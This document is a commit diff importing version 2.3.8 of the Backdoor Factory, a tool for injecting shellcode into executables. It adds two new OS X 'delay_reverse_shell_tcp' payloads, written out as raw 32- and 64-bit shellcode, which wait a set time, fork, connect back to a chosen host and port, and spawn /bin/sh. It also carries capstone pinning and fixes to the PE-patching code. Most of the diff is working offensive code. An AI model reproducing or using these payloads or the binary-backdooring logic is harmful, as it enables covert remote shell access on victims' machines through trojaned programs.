Commit b4ee9e50 authored by Mati's avatar Mati

Imported Upstream version 2.3.8

parent cbd41fae
......@@ -280,6 +280,18 @@ by one.
Usage: payloadtest.py binary HOST PORT
```
####1/1/2015
Happy New Year!
Two new OS X payloads! The delay: delay_reverse_shell_tcp
-B 30 --> delay the payload for 30 seconds, main code runs right away.
Setting of firm capstone commit for building into BDF, capstone 'Next' repo
breaks BDF.
Fixes to support cython capstone implementation null byte truncation issue
####12/17/2014
......
......@@ -62,7 +62,7 @@ def signal_handler(signal, frame):
class bdfMain():
version = """\
2.3.5
2.3.8
"""
author = """\
......
......@@ -10,7 +10,7 @@ git clone https://github.com/aquynh/capstone/
cd capstone
git checkout master
git checkout b53a59af53ffbd5dbe8dbcefba41a00cf4fc7469
./make.sh
......
......@@ -58,6 +58,44 @@ class macho_intel32_shellcode():
def returnshellcode(self):
return self.shellcode
def delay_reverse_shell_tcp(self):
#Modified from metasploit
if self.PORT is None:
print ("Must provide port")
return False
if self.HOST is None:
print ("This payload requires a HOST parameter -H")
return False
self.shellcode2 = "\xB8\x74\x00\x00\x02\xcd\x80" # put system time in eax
self.shellcode2 += "\x05" # add eax, 15 for seconds
self.shellcode2 += struct.pack("<I", self.BEACON)
self.shellcode2 += ("\x89\xC3" # mov ebx, eax
"\xB8\x74\x00\x00\x02\xcd\x80" # put system time in eax
"\x39\xD8" # cmp eax, ebx
"\x0F\x85\xf1\xff\xff\xff" # jne back to system time
)
self.shellcode2 += "\x68"
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += "\x68\xff\x02"
self.shellcode2 += struct.pack(">H", self.PORT)
self.shellcode2 += ("\x89\xe7\x31\xc0\x50"
"\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62"
"\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x54\x53"
"\x50\xb0\x3b\xcd\x80"
)
self.shellcode1 = ("\xB8\x02\x00\x00\x02\xcd\x80\x85\xd2")
self.shellcode1 += "\x0f\x84"
if self.jumpLocation < 0:
self.shellcode1 += struct.pack("<I", len(self.shellcode1) + 0xffffffff + self.jumpLocation)
else:
self.shellcode1 += struct.pack("<I", len(self.shellcode2) + self.jumpLocation)
self.shellcode = self.shellcode1 + self.shellcode2
return (self.shellcode1 + self.shellcode2)
def beaconing_reverse_shell_tcp(self):
#Modified from metasploit
if self.PORT is None:
......
......@@ -58,6 +58,50 @@ class macho_intel64_shellcode():
def returnshellcode(self):
return self.shellcode
def delay_reverse_shell_tcp(self):
if self.PORT is None:
print ("Must provide port")
return False
if self.HOST is None:
print ("This payload requires a HOST parameter -H")
return False
#From metasploit LHOST=127.0.0.1 LPORT=8080 Reverse Tcp
self.shellcode2 = "\xB8\x74\x00\x00\x02\x0f\x05" # put system time in rax
self.shellcode2 += "\x48\x05"
self.shellcode2 += struct.pack("<I", self.BEACON) # add rax, 15 for seconds
self.shellcode2 += ("\x48\x89\xC3" # mov rbx, rax
"\xB8\x74\x00\x00\x02\x0f\x05" # put system time in rax
"\x48\x39\xD8" # cmp rax, rbx
"\x0F\x85\xf0\xff\xff\xff" # jne back to system time
)
self.shellcode2 += ("\xb8"
"\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05\x49"
"\x89\xc4\x48\x89\xc7\xb8\x62\x00\x00\x02\x48\x31\xf6\x56\x48\xbe"
"\x00\x02"
)
self.shellcode2 += struct.pack(">H", self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x56\x48\x89\xe6\x6a\x10\x5a\x0f"
"\x05\x4c\x89\xe7\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"
"\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8\x3b\x00\x00\x02"
"\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x8b\x3c"
"\x24\x48\x31\xd2\x52\x57\x48\x89\xe6\x0f\x05"
)
self.shellcode1 = ("\xB8\x02\x00\x00\x02\x0f\x05\x85\xd2") # FORK()
self.shellcode1 += "\x0f\x84" # \x4c\x03\x00\x00" # <-- Points to LC_MAIN/LC_UNIXTREADS offset
if self.jumpLocation < 0:
self.shellcode1 += struct.pack("<I", len(self.shellcode1) + 0xffffffff + self.jumpLocation)
else:
self.shellcode1 += struct.pack("<I", len(self.shellcode2) + self.jumpLocation)
self.shellcode = self.shellcode1 + self.shellcode2
return (self.shellcode1 + self.shellcode2)
def reverse_shell_tcp(self):
if self.PORT is None:
print ("Must provide port")
......
......@@ -81,12 +81,20 @@ class intelCore():
self.count = 0
for k in md.disasm(self.f.read(12), self.flItms['VrtStrtngPnt']):
self.count += k.size
_bytes = bytearray(b'')
if len(k.bytes) < k.size:
_bytes = bytearray(b"\x00" * (k.size - len(k.bytes)))
value_bytes = k.bytes + _bytes
self.flItms['ImpList'].append([int(hex(k.address).strip('L'), 16),
k.mnemonic.encode("utf-8"),
k.op_str.encode("utf-8"),
int(hex(k.address).strip('L'), 16) + k.size,
k.bytes,
value_bytes,
k.size])
if self.count >= 6 or self.count % 5 == 0 and self.count != 0:
break
......@@ -103,12 +111,20 @@ class intelCore():
md = Cs(CS_ARCH_X86, CS_MODE_64)
for k in md.disasm(self.f.read(12), self.flItms['VrtStrtngPnt']):
self.count += k.size
_bytes = bytearray(b'')
if len(k.bytes) < k.size:
_bytes = bytearray(b"\x00" * (k.size - len(k.bytes)))
value_bytes = k.bytes + _bytes
self.flItms['ImpList'].append([int(hex(k.address).strip('L'), 16),
k.mnemonic.encode("utf-8"),
k.op_str.encode("utf-8"),
int(hex(k.address).strip('L'), 16) + k.size,
k.bytes,
value_bytes,
k.size])
if self.count >= 6 or self.count % 5 == 0 and self.count != 0:
break
......@@ -361,7 +377,7 @@ class intelCore():
resumeExe += "\x25"
resumeExe += self.compliment_me # zero out EAX
resumeExe += "\x05" # ADD
resumeExe += struct.pack('=i', ReturnTrackingAddress)
resumeExe += struct.pack('<I', ReturnTrackingAddress)
resumeExe += "\x50" # push eax
resumeExe += "\x25" # zero out EAX
resumeExe += self.compliment_you
......
......@@ -430,7 +430,7 @@ class pebin():
self.binary.write(struct.pack('<I', self.flItms['NewSizeOfImage']))
self.binary.seek(self.flItms['BoundImportLocation'])
if self.flItms['BoundImportLOCinCode'] != 0:
self.binary.write(struct.pack('=i', self.flItms['BoundImportLOCinCode'] + 40))
self.binary.write(struct.pack('<I', self.flItms['BoundImportLOCinCode'] + 40))
self.binary.seek(self.flItms['BeginSections'] +
40 * self.flItms['NumberOfSections'], 0)
self.binary.write(self.flItms['NewSectionName'] +
......
......@@ -12,7 +12,7 @@ cd capstone
if [[ `git pull` != "Already up-to-date." ]]; then
git checkout master
git checkout b53a59af53ffbd5dbe8dbcefba41a00cf4fc7469
./make.sh
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment